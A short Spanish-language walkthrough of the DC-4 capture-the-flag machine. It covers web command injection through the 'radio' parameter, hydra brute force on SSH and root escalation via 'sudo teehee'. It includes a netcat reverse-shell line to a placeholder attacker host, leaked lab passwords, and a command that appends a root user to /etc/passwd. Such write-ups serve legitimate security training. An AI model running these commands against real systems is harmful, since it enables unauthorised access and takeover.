DC-4 encadena una inyección de comandos web con un pivoteo entre usuarios y una escalada final poco habitual: teehee.
Servicios: 22 SSH · 80 HTTP
1. Command injection
Con el login por defecto admin/happy, el endpoint command.php ejecuta comandos del sistema a través del parámetro POST radio. Lo abusamos para una reverse shell:
# POST radio=... con nc -e /bin/bash <ATK> <PORT>
2. Pivoteo con hydra
En /backup/old-passwords.bak hay un diccionario de contraseñas antiguas. Lo usamos contra SSH:
hydra -l jim -P old-passwords.bak ssh://target # jim:jibril04
Un correo local de jim filtra la contraseña de charles: ^xHhA&hvim0y.
3. Escalada — sudo teehee
sudo -l para charles muestra teehee (variante de tee). Podemos añadir un usuario root a /etc/passwd:
echo 'hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0::/root:/bin/bash' | sudo teehee -a /etc/passwd
su hacker # uid=0 → root
Conceptos aplicados
- Command injection en parámetro web.
- Fuerza bruta con diccionario “old passwords”.
- sudo teehee — append a
/etc/passwdpara crear root.